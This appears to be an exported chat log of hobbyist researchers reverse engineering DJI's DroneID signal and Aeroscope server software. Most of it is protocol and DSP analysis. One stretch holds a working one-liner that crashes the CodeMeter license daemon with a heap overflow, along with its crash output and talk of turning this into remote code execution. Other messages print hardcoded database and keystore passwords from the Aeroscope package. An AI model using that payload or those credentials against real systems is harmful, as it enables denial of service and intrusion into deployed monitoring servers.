According to many sources Ocusync protocols include a layer of encryption of the Tx.. As far as I know AES-256 has not been broken.. So if a device is able to get the flight data we have two possibilities: the first is that a backdoor is lying somewhere, the second (and maybe both) is that the keys or the way of generating keys is known and used in those Aeroscopes.
[2022-04-10 20:26:09]
hiddentty :
Am I right?!
[2022-04-10 20:30:09]
jan2642 :
Or third and even more likely: some data is considered 'broadcast' and not encrypted at all. With Wifi this is the case, video stream is encrypted but drone id is part of the 802.11 beacons and not encrypted.
[2022-04-10 20:30:14]
atlantic :
Aeroscope receives a separate unencrypted signal
[2022-04-10 20:30:48]
atlantic :
there are 3 signals: uplink, downlink, drone id
[2022-04-10 20:31:40]
atlantic :
see the very nice png from @tmbinc a couple of days ago.
[2022-04-10 20:33:37]
hiddentty :
Thanks guys for the clarifications, I've just begun to read the previous messages, a massive amount of research has already been done !
[2022-04-10 20:36:25]
atlantic :
pluto has usb 2.0 limiting the sample rate.
[2022-04-10 20:41:08]
jan2642 :
A new LimeSDR Mini 2.0 (USB3) with a Lattice ECP5 is supposedly 'launching soon' on CrowdSupply: https://www.crowdsupply.com/lime-micro/limesdr-mini-2-0
[2022-04-10 20:42:39]
jan2642 :
Max 3.5 GHz though...
[2022-04-10 20:45:56]
jan2642 :
No idea what the price will be but the original LimeSDR Mini was $159.
[2022-04-10 21:17:53]
blackie37 :
blackie37 joined the channel.
[2022-04-10 22:17:12]
b1tninja :
I remember looking at the fw and it looked like they seeded random with the startup time or something stupid like that, so maybe only a few keys are really ever used anyway
[2022-04-10 23:27:35]
hostile :
@hiddentty the reddit thread seemed more hopeful, and inquisitive than anything. Seemed like random folks spitballing ideas. https://www.reddit.com/r/DJIUnlocked/comments/twbwi0/dji_aeroscope_how_to_avoid_aircraft_identification/
[2022-04-10 23:29:29]
hostile :
basically I think this comment "So for me, there is only one way to achieve that .. there is a backdoor somewhere or the encryption keys or gen scheme of the RC/Aircraft are known and used in the Aeroscope" seems to miss the fact that DroneID communications are out of band (OOB) from the standard C2 link.
[2022-04-11 01:25:55]
dragorn :
generic comment re: encryption - you don't have to break the algo to break a misuse of it or a known key, too :) Even RC4 in WEP wasn't as hilariously broken as it seems, they just did a *terrible* job using it *correctly*.
[2022-04-11 01:26:21]
dragorn :
but yeah the droneid stuff is meant for "public" (semi-public?) consumption
[2022-04-11 02:15:53]
b1tninja :
[2022-04-11 02:16:19]
b1tninja :
```
__seedval = time((time_t *)0x0);
srand48(__seedval);
iVar2 = 0;
do {
uVar3 = lrand48();
```
[2022-04-11 06:16:54]
qq2921635643 :
qq2921635643 joined the channel.
[2022-04-11 06:42:27]
hiddentty :
Yeap ! I confess that I wrote those lines when entering into the subject, without certitude. Just my first observations of possibilities, based on the belief that all the communication between RC and Aircraft was using a single protocol, with a layer of encryption. But after reading the research made on this channel, it is obvious to me now that it is more subtle.
[2022-04-11 06:49:22]
hiddentty :
Yes, I agree with you, but I didn't expect a weak use of a security algorithm from DJI. I was more betting on an already known key or knowledge of the parameters influencing the keygen.
[2022-04-11 06:50:33]
hiddentty :
Sorry I'm quite new and still making baby steps in C and probably didn't get what you want to explain with this.
[2022-04-11 07:00:02]
hiddentty :
The question I would like to ask is: is the Aircraft the only one to broadcast data used by Aeroscope devices, or does the RC do it too? And after that, what role does the OOB play for a regular flight? Is it needed data, or can it be cut or falsified?
[2022-04-11 07:06:29]
bin4ry :
so i cannot see any broadcasts showing up on the AS when the drone is not powered on
[2022-04-11 07:06:57]
bin4ry :
which of course does not mean anything, but at least the AS does not display something ;)
[2022-04-11 08:07:25]
atlantic :
The RC does not transmit drone id, only uplink packets. But if your phone/tablet has an enabled GPS, the app will transmit the GPS coordinates to the aircraft and the aircraft includes those app GPS coordinates and time stamp in the drone id message.
[2022-04-11 09:04:34]
tmbinc :
Maybe stupid question - cross-correlation in time domain is multiplication in frequency domain, right?
What we need is cross-correlation in frequency domain (correct?), so is there an equivalent time-domain operation that is simpler?
[2022-04-11 09:05:49]
tmbinc :
(* Multiplication with fft of time reversed conjugated signal.. doesn't matter complexity-wise as we could pre-calculate this anyway... not that it is difficult either.)
[2022-04-11 09:07:44]
tmbinc :
https://en.wikipedia.org/wiki/Convolution_theorem etc.
[2022-04-11 10:17:21]
jan2642 :
I was going to suggest a double fft but it seems that that is the equivalent of time inversion (times a constant): https://dsp.stackexchange.com/a/24881/4298
[2022-04-11 17:02:52]
atlantic :
i do cross correlation of the ZC in time domain, to find a packet.
[2022-04-11 20:14:37]
hostile :
FYI, Aeroscope in Russian is: АЭРОСКОП
[2022-04-12 02:05:49]
proto :
there's also a pretty crappy limit on how fast the pluto can move data between the arm (processing system - PS) and the fpga (programmable logic - PL). this issue hit ettus as well with their E series radios. i recall there was a talk at some sdr conference (maybe gnuradio) about how one company overcame that limitation with custom DMA drivers
[2022-04-12 02:09:10]
proto :
just to add another method: you can use a FIR filter or FFT filter (esp here since the filter length is a power of two). take the conjugate of the sequence you want to correlate against and set that as the filter taps. what you will get out is the same as the cross correlation of the sequence, but at least in the case of the fft filter, probably better performance than a normal element-wise dot product
[2022-04-12 02:12:55]
hostile :
so what is left to do @proto ? I know we losing you to real work soon.
[2022-04-12 02:14:27]
proto :
automatic freq correction (likely with either ZC or the cyclic prefix(es))
remainder of descrambling (just have the first symbol atm)
turbo removal
rate matching
[2022-04-12 02:15:41]
proto :
preparing to write up a wiki on how each step was done in my case
[2022-04-12 02:17:11]
hostile :
@icer I know shit got hectic for you... but ^
[2022-04-12 02:18:56]
proto :
was hoping the turbo and rate matching would be cake using openphy (https://github.com/ttsou/openphy) but the code seems to compile into individual `.o` files which you have to figure out dependencies for by hand. there's almost certainly an easy way to do this, but it ate an hour of my life just playing dependency whack-a-mole. i usually lean on `make VERBOSE=1` to see deps for each file, but that doesn't seem to do anything here :(
[2022-04-12 02:33:17]
proto :
example of the fft filter from gnuradio set to look for the first ZC sequence. note that it's normalized from the start which is wonderful. using arbitrary absolute thresholds for pattern detection sucks
[2022-04-12 02:34:38]
proto :
and if you delay the incoming samples (by `int(fft_size * 4) + long_cp_len + (short_cp_len * 3)` in my case) you can line the correlation up with the start of the burst :)
[2022-04-12 02:35:49]
proto :
otherwise you end up right after the first zc seq
[2022-04-12 03:44:45]
proto :
i'll be updating the wiki page (https://github.com/proto17/dji_droneid/wiki) a little at a time to document how i went about the DSP side of things. just uploaded the recording and burst measurement steps
[2022-04-12 05:49:42]
atlantic :
very interesting. I am not sure if i understand it already, but i like to learn this.
[2022-04-12 05:51:08]
atlantic :
like i said about the first symbol: this was DJI's gift to reverse engineering.
hostile :
Here is an updated version of the patches to gr-ieee802-11 that silence it, and only spit out DroneID serial number. (I'll do the rest of the fields later).
[2022-04-12 07:33:00]
eingin :
eingin joined the channel.
[2022-04-12 08:58:06]
herasymyuk :
herasymyuk joined the channel.
[2022-04-12 13:00:32]
skynet :
skynet joined the channel.
[2022-04-12 13:04:18]
conchimnon :
conchimnon joined the channel.
[2022-04-12 13:16:09]
wechdamit :
wechdamit joined the channel.
[2022-04-12 16:08:38]
kirill17 :
kirill17 joined the channel.
[2022-04-12 17:49:32]
jan2642 :
To come back to that correlation in frequency domain which would need F(F(x(t))) which is effectively x(-t): would it be correct to just multiply the signal with the ZC sequence (which is symmetrical so t or -t wouldn't make a difference), check if the result has a very clear peak and if it does, there's a match and the peak indicates the time offset ? Or is that oversimplification ? (My last signal processing course was in the nineties...)
[2022-04-13 00:57:36]
proto :
here i am using the conjugate of the first zc sequence as a matched filter. the output of the top complex to mag squared will have a normalized cross correlation result between 0-1.0 with 1.0 being a perfect match
[2022-04-13 00:58:04]
proto :
oh derp, you said freq domain. my bad
[2022-04-13 02:44:48]
proto :
Just added burst extraction and coarse timing estimation to the wiki https://github.com/proto17/dji_droneid/wiki
[2022-04-13 02:48:00]
proto :
unfortunately i don't have a lot of time during the week to write wiki entries or continue work on the demod, so the info will trickle in. and i likely won't have much time this weekend either =\
[2022-04-13 03:31:16]
b1tninja :
the big thing is that the radio secret is generated using lrand48, but it's seeded with the number of seconds since the drone/rc was powered on
[2022-04-13 03:31:36]
b1tninja :
so there's only a few possibilities
[2022-04-13 22:50:17]
zgvs2 :
I have one in the mail and want to test this :) I just hope this m2 card works on my old dell :) very much looking forward to trying this. Do you also know where that droneid.py script you pasted output from earlier is available? EDIT: I think I found the updated droneid.py script in the EnchancedWifi channel thanks :)
[2022-04-14 01:26:11]
hostile :
this is all I'm aware of re: public discussion of DUML and droneID. https://twitter.com/d0tslash/status/1511215231011368965
[2022-04-14 01:49:42]
proto :
just in case it's happening on ocusync as well, lightbridge had a "scrambler" on the DUML that it sent over the RF uplink. That "scrambler" was a random 8 bit value that was applied to all bytes. The funny part was that there was a known 0x55 (or was it 0xaa?) preamble to all DUML frames. So... that made guessing the "scrambler" pretty easy :rolling_on_the_floor_laughing: So, if there is any kind of encryption that creates a string of bytes that are XOR'd on the DUML it might be worth looking for something dumb like that
[2022-04-14 07:43:38]
jackhmcd :
jackhmcd joined the channel.
[2022-04-14 13:24:36]
mavic2pro666 :
xiamen66 joined the channel.
[2022-04-15 01:24:15]
hostile :
lord that ain't cheap!
[2022-04-15 01:24:16]
hostile :
https://twitter.com/d0tslash/status/1514776524196524032?s=20&t=9pTTuH7IHW8oQTJcDjhekQ
[2022-04-15 01:24:41]
hostile :
[2022-04-15 02:18:20]
mavic2reverser :
??? what a joke
[2022-04-15 11:50:19]
dkovar :
Curious why you disagree with that? Gresco hosted all of the infrastructure in their own cloud that they stood up here in the U.S. (Full disclosure, I know people at Gresco and Mass State Police)
[2022-04-15 13:35:08]
hostile :
Didn't say I disagreed with it, but FWIW. I do have qualms about their use of an encrypted .WAR file. Just like the innards of the drones. We cannot concretely say anything about the ability to call home IF the product chooses to when it is encrypted to high hell @dkovar
[2022-04-15 13:37:45]
hostile :
WEB-INF/classes/com/wibu/xpm/encrypted this Wibu encryption shit, doesn't help my concerns any. Maybe once we get it reversed. Also when I first got my Aeroscope unit, the same narrative was present "It doesn't call home ever"! The literal first fucking thing it did when I plugged it in, was call home to DJI servers. Brendan and I talked about it, he was embarrassed, and it was ultimately a feature that was removed. We can only ever speak to a snapshot in time, and only to the decrypted. It is that simple IMHO.
[2022-04-15 13:39:06]
hostile :
So... let's decrypt the .war function and talk further.
[2022-04-15 13:49:20]
hostile :
But hey. I'd also be willing to consume any due diligence security audit they did against Aeroscope, assuming they did one, I've not seen one historically out of anyone @dkovar
[2022-04-15 13:49:41]
hostile :
letter of attestation from a pentesting company, etc.
[2022-04-15 13:51:21]
hostile :
Also love this "In light of the fact that the manual is not completed, the withholding of these records is necessary in order for the Department to perform its proper governmental function of producing a working manual for the effective detection of drones." https://farewell-ladmin.com/how-the-mass-state-police-can-monitor-drones/
[2022-04-15 14:11:48]
hostile :
now ya done made me order a USB stick so I can get the codemeter daemon to launch so I can exploit it lol
[2022-04-15 14:11:54]
hostile :
[2022-04-15 14:36:23]
dragorn :
Technically the state-side admins could set up proper egress filtering and logging and catch it if it does. Will they? Who knows. Also depends how it needs to reach out to the world for normal operations.
[2022-04-15 15:37:12]
mavic2reverser :
@dragorn I wonder how it receives map tiles, unless they're offline. if they did apply filtering, they'd at least have to let the map tiles through
[2022-04-15 15:41:43]
dragorn :
yep. no idea. might have to run its own local map server, too, for eula w/ the map sites
[2022-04-15 16:43:06]
dkovar :
I've seen all sorts of really cool exfil techniques while doing incident response engagements. Absolutely possible to exfil Aeroscope data if someone were so inclined.
But, why bother? Really, what sensitive information is in there? There is business intelligence value, but is it valuable enough to take the risk?
And, given some of the infrastructure supporting Aeroscope deployments, it would be far easier to hack into the supporting infrastructure and take everything.
[2022-04-15 16:45:35]
dkovar :
I doubt anyone is going to invest time in an Aeroscope security audit. No one really cares. They generally assume that the data is "secure enough" and get on with things.
There are a lot of CUAS integrators building nationwide networks that are, or will, gather far more interesting information than DJI Aeroscopes, and they are probably not paying enough attention to their cyber defenses.
[2022-04-15 17:33:07]
hostile :
"But, why bother? Really, what sensitive information is in there?" patterns of life are interesting nonetheless, as is one's entitlement to privacy. Also, we've been here before. https://www.eff.org/deeplinks/2019/03/heres-why-you-cant-trust-what-cops-and-companies-claim-about-automated-license
[2022-04-15 17:41:27]
hostile :
Back to the encryption discussion... I've certainly not forgotten that we discovered JPush in the Go App for example, and similarly that SLiu (aka Nobody) had integrated GPS triggers into it. There are a number of special logic conditions that could be hidden before illicit, or *analytical*, marketing data, or bug reports (I'm being generous here) decided they needed to make it back home for some reason. The track record simply leaves me cautious when folks make claims like the one found in the bid above. Cuz really it isn't an assertive statement anyone can make right now. Jpush for example had the ability to remain silent until a certain GPS location came in view. Sure... could have been only for targeted marketing, or regionalized patching, etc. coulda also been used for other shit. I'm just cautious to endorse comments like "There is NO connectivity to DJI and/or its servers and/or it's agents"
[2022-04-15 17:47:03]
hostile :
"it would be far easier to hack into the supporting infrastructure and take everything" I'm not half convinced these boxes can't be used as a jump off point into other infrastructure to that point.
[2022-04-15 17:47:48]
hostile :
wondering IF you accidentally are stupid enough to leave one exposed, how easy it is to pivot.
[2022-04-15 17:47:50]
hostile :
```
./WEB-INF/classes/redis.local.properties:#redis.password=125587962
./WEB-INF/classes/redis.local.properties:redis.password=redispass
./WEB-INF/classes/mysql.local.properties:flyingmgr.password=test1234
./WEB-INF/classes/mysql.local.properties:#flyingmgr.password=3r2pu4rh
./WEB-INF/classes/redis.properties:redis.password=redispass
./WEB-INF/classes/mysql.properties:flyingmgr.password=test1234
```
[2022-04-15 17:47:57]
hostile :
cuz some of this shit is lulz worthy.
[2022-04-15 17:48:20]
hostile :
Assuming you can't change passwords that are hard coded into the .war file for example. *shrug*
[2022-04-15 17:49:10]
hostile :
or if there is a magic RF packet you can send that can be leveraged for access. Lots of questions... no time to seek answers, nor bypass encryption for a full view
[2022-04-15 17:49:23]
hostile :
only time to armchair quarterback potential scenarios
[2022-04-15 18:18:58]
hostile :
It is kinda interesting to think that there was a huge push to get public safety to use DJI drones (very successful marketing push one may say). What are the ramifications of your own gear, and patterns of use turning up in your own system, and potentially getting exposed? Fun questions that we may eventually learn the answers to. https://enterprise.dji.com/public-safety
[2022-04-15 19:36:24]
droneuser :
@hostile where on the aeroscope did you get that encrypted war file?
[2022-04-15 20:35:01]
hostile :
non portable version
[2022-04-15 20:57:14]
hostile :
httpd is also encrypted
[2022-04-15 20:58:15]
dkovar :
Public safety willingly bought DJI drones because they provided the best capabilities for the price. 3DR, GoPro and others failed to compete with DJI and no good options were left.
[2022-04-15 20:58:57]
dkovar :
Public safety continues to buy DJI for that reason.
[2022-04-15 20:59:46]
hostile :
lowest bidder situations have always been ripe for exploitation in various scenarios. Excuses need not apply. It is all *understood*.
[2022-04-15 21:02:46]
hostile :
don't forget too many states were given DJI gear on loan IIRC 45 different agencies I think it was?
[2022-04-15 21:03:37]
hostile :
https://enterprise-insights.dji.com/blog/us-covid-19-relief-program-update
[2022-04-15 21:03:48]
hostile :
```Today, we’re pleased to announce we are distributing 100 drones to 45 police, fire and public safety organizations in 22 states. ```
[2022-04-15 21:04:28]
hostile :
(Skydio did the same FWIW)
[2022-04-15 21:11:10]
hostile :
also... lest we not forget the poorly written ICE document.
[2022-04-15 21:11:13]
hostile :
[2022-04-15 21:12:35]
hostile :
I always thought the use of "target" was apt.
[2022-04-15 21:12:37]
konraditurbe :
And what if the lowest bidder has to be supplying a dji drone .. because the tender indirectly asks for one.
[2022-04-15 21:13:42]
konraditurbe :
Some of the specs in the tenders are copied from DJI's spec sheet. There was an article about this. trying to find it.
[2022-04-15 21:14:20]
hostile :
Slanted bid wording has ALWAYS been a thing
[2022-04-15 21:15:27]
hostile :
But yeah when your Bid says "AeroScope hardware, monitoring and tracking software", and not "CUAS platform". You get exactly what you ask for. https://www.governmentbids.com/government-bid-opportunity-public-14870416-en.jsa
[2022-04-15 21:18:20]
coldflake :
Decrypt key is in the firmware 100%
[2022-04-15 21:20:38]
hostile :
they using WiBu my man
[2022-04-15 21:20:43]
hostile :
hardware dongles
[2022-04-15 21:26:12]
the_lord :
DJI don't provide hardware dongles to dealers when they purchase the local deployment software; the dealers get wibu license files
[2022-04-15 21:26:46]
hostile :
hah nice
[2022-04-15 21:27:28]
hostile :
surprised they went with the weaker option
[2022-04-15 21:27:33]
hostile :
well cheaper I guess
[2022-04-15 21:29:03]
the_lord :
so they can get more profit
[2022-04-15 21:29:38]
the_lord :
if they find opensource solution they will use it ;)
[2022-04-16 01:55:39]
hostile :
now I gotta figure out what the daemon was complaining about when it was trying to launch. =]
[2022-04-16 22:13:08]
nopexecutor :
@proto did you get all the details already? Based on github readme I can see you are past descrambling, FEC and some data interpretation, right?
[2022-04-16 22:21:56]
nopexecutor :
if spoofing is the main target, good rx chain / synchronization is probably not that important... just to have it good enough to understand the details of the protocol and be able to verify the TX chain...
[2022-04-16 22:22:47]
nopexecutor :
if you are still missing ZC params - try u=600 and 147 EDIT: just found those values used already in the github repo ;)
[2022-04-16 23:12:45]
nopexecutor :
so maybe you already have all the blocks needed...
[2022-04-17 04:27:06]
hostile :
this makes me smile how the default port mapping works on the "local" version.
[2022-04-17 05:08:19]
hostile :
LOLOL this CodeMeter daemon is trash
[2022-04-17 05:08:23]
hostile :
```
$ python3 -c "import os,struct; size=0x100; os.write(1,b'samc'+struct.pack('<LHHL',size+2,0x71,1,0)+b'\xA2\x05'+b'A'*size)" | nc 10.0.0.30 22350 | xxd
00000000: 7361 6d63 0801 0000 7100 0100 0000 0000 samc....q.......
00000010: 0000 0000 6800 0000 4141 4141 4141 4141 ....h...AAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000030: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000040: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000050: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000060: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000070: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000080: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000090: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000a0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000b0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000c0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000d0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000e0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000f0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000100: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000110: 4141 4141 4141 4141 AAAAAAAA
```
[2022-04-17 05:08:58]
hostile :
```
2022-04-17 01:07:48: API Event WB0104 (INTERNAL ORGANISATION, AG) occurred (returned to caller)
2022-04-17 01:07:48: API Event WB104 (INTERNAL ORGANISATION) occurred (returned to caller)
malloc(): corrupted top size
Aborted (core dumped)
```
[2022-04-17 05:09:23]
hostile :
```
$ python3 -c "import os,struct; size=0x110; os.write(1,b'samc'+struct.pack('<LHHL',size+2,0x71,1,0)+b'\xA2\x05'+b'A'*size)" | nc 10.0.0.30 22350
```
== b00m
[2022-04-17 05:09:32]
hostile :
@icer ...
[2022-04-17 05:10:59]
hostile :
PoC's from the tenable writeup. https://www.tenable.com/security/research/tra-2021-24
[2022-04-17 05:23:46]
atlantic :
what is the "open service"?
[2022-04-17 05:31:05]
hostile :
unclear. also wonder what this was ?
[2022-04-17 05:31:15]
hostile :
https://github.com/lt594963425/ArouteDemo
[2022-04-17 05:38:49]
hostile :
@atlantic re: open service
[2022-04-17 05:38:54]
hostile :
```
  open_service:
    image: aeroscope/aeroscope_open_service:7c52d99c
    depends_on:
      - mysql
      - mongodb
      - redis
      - fluentd
    ports:
      - "8090:8090"
    volumes:
      - /etc/group:/etc/group:ro
      - /etc/passwd:/etc/passwd:ro
      - /etc/localtime:/etc/localtime
    hostname: open_service
    environment:
      - MONGO_INITDB_ROOT_USERNAME=$mongodb_usr
      - MONGO_INITDB_ROOT_PASSWORD=$mongodb_pwd
      - MYSQL_ROOT_PASSWORD=$mysql_pwd
    networks:
      - aeroscope_bridge
    logging:
      driver: fluentd
      options:
        tag: aeroscope.open_service
```
[2022-04-17 07:34:16]
atlantic :
android app that queries an Aeroscope server via webapi and displays it on a map?
[2022-04-17 07:35:57]
atlantic :
open service: depends on log and databases. then it must be the chinese backdoor to get all your data ?
[2022-04-17 07:41:07]
atlantic :
at least they are "open" about it, they could have given it a more covert name.
[2022-04-17 08:36:09]
soilder76 :
soilder76 joined the channel.
[2022-04-17 14:33:33]
hostile :
TBH @atlantic after going back through the AWS dump from years ago I suspect at this point Supervisor program was actually an early version of FlightHub / Aeroscope that they were using on customer log files. And TBH I suspect they still use it on "volunteered" log files. Now, on the other hand the practice of using piss poor default passwords, and leaving keys laying around to be *found* may not be directly malicious, but may also certainly be by design. If you can encourage folks to use your leaky product, and they are too stupid for due diligence, it is in your favor in both cases sales wise, and data collection wise.
[2022-04-17 14:35:10]
hostile :
DJI engineering legit argued with me when I was at D13 saying that we did NOT crack the encryption on lightbridge, and that it was impossible for us to inject DUML frames. The ramifications of course are full compromise of C2 stream. Same thing with Enhanced Wifi & WEP, they've known of this *feature* for at least 5 years now, and have chosen to do nothing about it. It may be in *someone's* favor to have those links readily crackable, or perhaps it isn't. Who actually knows.
[2022-04-17 14:36:37]
hostile :
I discussed my opinion on their log file consumption around this time last year. https://www.youtube.com/watch?v=_zWGBfPNTPU&t=1832s
[2022-04-17 14:37:31]
hostile :
even going back to the many times historically that the sync data button gets desynch'd and flips itself to on silently. *shrug*.
[2022-04-17 14:38:41]
hostile :
They obviously can't as readily, and blatantly get access to that same data as they could before because everyone is watching. I'm still a firm believer that SecNeo for one hides logic that they do not seek for us to see. Until we CAN see, I'll maintain that stance based on what I've already seen from them.
[2022-04-17 14:40:48]
hostile :
But yes I 100% believe however they obtain log files, volunteer, accidental on purpose, or directly taken in some cases they absolutely analyze the hell out of them for at the very least business logic. And as poorly as this ICE report was written, I think there was some reality at the core. https://info.publicintelligence.net/ICE-DJI-China.pdf
[2022-04-17 14:41:15]
hostile :
We've missed the boat on catching them "red handed" with some of this stuff though. They have to be much more covert by nature now, simply due to all the scrutiny.
[2022-04-17 14:44:04]
hostile :
At this point much of this is based on correlation. Every little shred you can get. I'd openly call anyone a fool that didn't recognize that DJI is acting as a data broker (even if just for the .cn government). https://www.youtube.com/watch?v=wqn3gR1WTcA
[2022-04-17 15:54:20]
hostile :
also had forgotten about this
[2022-04-17 15:54:27]
hostile :
[2022-04-17 15:54:40]
hostile :
[2022-04-17 18:38:58]
skyninja :
In the server software there is this server.jks and serverTrust.jks.
$ keytool -list -keystore server.jks
Enter keystore password:
Keystore type: JKS
Keystore provider: SUN
Your keystore contains 1 entry
aeroscope_local_server, Oct 2, 2018, PrivateKeyEntry,
Certificate fingerprint (SHA-256): 2C:80:D6:06:E2:7D:2C:5B:79:E7:C7:CB:2F:DF:F1:C2:DF:CD:C7:73:3B:79:EE:13:F4:8B:9E:99:07:3F:54:91
$ keytool -list -keystore serverTrust.jks -storepass aeroscope
Keystore type: JKS
Keystore provider: SUN
Your keystore contains 1 entry
ca, Oct 2, 2018, trustedCertEntry,
Certificate fingerprint (SHA-256): 2D:6E:D5:67:7D:66:63:C1:67:1C:30:9A:B2:4B:48:A5:81:96:91:18:C6:41:2B:AE:C2:10:8E:02:79:3C:C7:0F
[2022-04-17 18:40:27]
skyninja :
the private key from server.jks and the certificate in serverTrust.jks do not seem to match. I assumed the private key from server.jks was the private key for the certificate in serverTrust.jks.
[2022-04-17 18:41:00]
skyninja :
$ openssl pkey -check -in aeroscope_local_server.key -pubout
Key is valid
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA179h9CTv/glEg8l46wCS
Wm01cHBKo5pNBax++W7l28HH42oCH7PNvjHRD8zifiG3ER766DduNNYsBBhpXN0B
pO9JvCk9a/Zi89EayKX1dh+w4xv59Vdgb8rOpYe2n5mjAL6yNB6x4/y+wmsE2Vno
0awO6jAOxuGjVdVPATJFCSV2uqDwIxFkIUWf5fcNF70Dg1UkPbl5WS6HIS40Upol
FGOulSFzgBayEXQUWAD9Z5Z9CaLpsOt0SfWlncUlpMZ9lzfuppRFkLTjj9l4kAxO
mQYgo6TfTdeCdKG5YZ9fcPD3Aa2ye216Fc0xqRBMTF1cysP8YYHChVT0QQF4DCyB
QwIDAQAB
-----END PUBLIC KEY-----
[2022-04-17 18:41:12]
skyninja :
$ openssl x509 -in ca.pem -noout -pubkey
-----BEGIN PUBLIC KEY-----
(public key body not preserved in this export)
-----END PUBLIC KEY-----
[2022-04-17 18:41:33]
skyninja :
they are not even similar length. Am I doing something wrong?
[2022-04-17 18:44:07]
skyninja :
The private key for each Aeroscope is RSA encrypted. The passphrase is derived in the firmware. Does anybody know how this works? How can I derive the passphrase from, say, the serial number?
[2022-04-17 19:22:40]
hostile :
some interesting detail on CodeMeter API and encryption for anyone thinking about exploiting the overflow. https://f.hubspotusercontent20.net/hubfs/2553528/License%20to%20Kill%20Leveraging%20License%20Management%20to%20Attach%20ICS%20Networks.pdf
[2022-04-17 19:24:06]
hostile :
also some solid detail on the license file format which could be used to exploit a different overflow
[2022-04-17 19:25:07]
hostile :
```
With a reliable payload intact, we set our eyes on a better CodeMeter API interface we could take advantage of to inject a malicious license file on demand. The server intends for local clients only to connect to it with a local nonce, but how secure is it? With some research into its communication we found a way to crack the seed of the encryption key to create proper API requests and parse their responses. We developed this into a CodeMeter API in Python that we could execute remotely, no authentication required, to connect to the CodeMeter server and load our custom licenses as we pleased. By leveraging our new API capabilities we were able to find additional memory corruption bugs and eventually reach pre-auth remote code execution and consequently, we now had CodeMeter in our command
```
[2022-04-17 19:26:41]
hostile :
Sadly they don't share the actual python library on github. just a sample hello packet. https://github.com/claroty/License-to-Kill/blob/master/codemeter_port_check.py
[2022-04-17 19:28:33]
hostile :
which ones are you using @skyninja looks like there are a few
[2022-04-17 19:28:38]
hostile :
```
MD5 (./WEB-INF/classes/server.jks) = 647ba0b504cee193688b8834a55b021a
MD5 (./WEB-INF/classes/serverTrust.jks) = a7a6ad43519fb5ff3ee4361d314e75c1
MD5 (./data/monitor_backend_file/certificate/server.jks) = f13b6e4053a945825f1cb15036fc3dbb
MD5 (./data/monitor_backend_file/certificate/serverTrust.jks) = 7839734316e9e0927c52ece17f2149fe
MD5 (./data/tomcat-webapp/WEB-INF/classes/server.jks) = 647ba0b504cee193688b8834a55b021a
MD5 (./data/tomcat-webapp/WEB-INF/classes/serverTrust.jks) = a7a6ad43519fb5ff3ee4361d314e75c1
```
[2022-04-17 20:48:25]
skyninja :
the upper two. i did not see the lower two, thanks!
[2022-04-18 00:30:14]
lmore377 :
lmore377 joined the channel.
[2022-04-18 01:58:07]
hostile :
fwiw @atlantic this is what the open_service is running.
[2022-04-18 07:08:52]
atlantic :
dji smart enough to choose non-descriptive names.
[2022-04-18 07:10:04]
atlantic :
_enc is probably because it is protected by codemeter.
[2022-04-18 09:19:58]
skyninja :
I do not have ./data/tomcat-webapp/
[2022-04-18 09:21:04]
skyninja :
data/monitor_backend_file is in the install package. But i did not install it.
[2022-04-18 09:21:54]
skyninja :
there are no .jks files in the aeroscope.tar. so i assume they are dynamically generated.
[2022-04-18 12:38:41]
hostile :
you are correct _enc is because it is code meter protected. Unjar the .war file...
[2022-04-18 12:38:56]
hostile :
you'll find the tomcat-webapp folder inside the .war
[2022-04-18 17:48:16]
skyninja :
thanks. found the key and cert. Cert is 100% the same. Key is different but also not matching.
[2022-04-18 19:42:20]
airiver :
airiver joined the channel.
[2022-04-19 02:50:53]
john.abbey :
john.abbey joined the channel.
[2022-04-19 03:58:25]
hostile :
fresh hot tamales.
[2022-04-19 03:58:31]
hostile :
https://github.com/proto17/dji_droneid
[2022-04-19 04:05:31]
proto :
the latest updates allow demodulation down to the drone id payload. there is a C++ program that needs to be built (https://github.com/proto17/dji_droneid/blob/main/cpp/remove_turbo.cc) first. then you can take a recording with your favorite sdr (save as complex single precision floats!), edit the first few lines of process_file.m (https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/process_file.m#L26) to match your file path, and recording parameters, then run `process_file` and wait. curious to see if anyone else has any luck with it. i took really clean recordings with an ettus b205-mini of my dji mini 2 and it seems to work pretty well
[2022-04-19 04:06:20]
proto :
constellation points are much cleaner now that the first zc is used for some seriously bare bones equalization
[2022-04-19 04:08:02]
proto :
oh, and while this code does work in octave, it's crazy slow compared to matlab. so if you have matlab and the signals and comms toolboxes, i really recommend that. poor octave seems to only ever use one core where matlab is using all available cores
[2022-04-19 04:09:03]
hostile :
```You can get octave to use some libraries like ATLAS which utilize multiple cores. So while Octave only uses one core, when you encounter a heavy operation, octave calls functions in ATLAS that utilize many CPU's.``` https://stackoverflow.com/questions/11889118/get-gnu-octave-to-work-with-a-multicore-processor-multithreading
[2022-04-19 04:09:08]
hostile :
not sure if applicable but FWIW
[2022-04-19 04:15:00]
hostile :
got me all excited but I gotta go to bed
[2022-04-19 04:15:07]
hostile :
```
sudo apt-get install octave-signal
```
[2022-04-19 04:15:20]
hostile :
```
ciajeepdoors@AeroScopeWrecker:~/dji_droneid/cpp$ wget https://raw.githubusercontent.com/d-bahr/CRCpp/master/inc/CRC.h
```
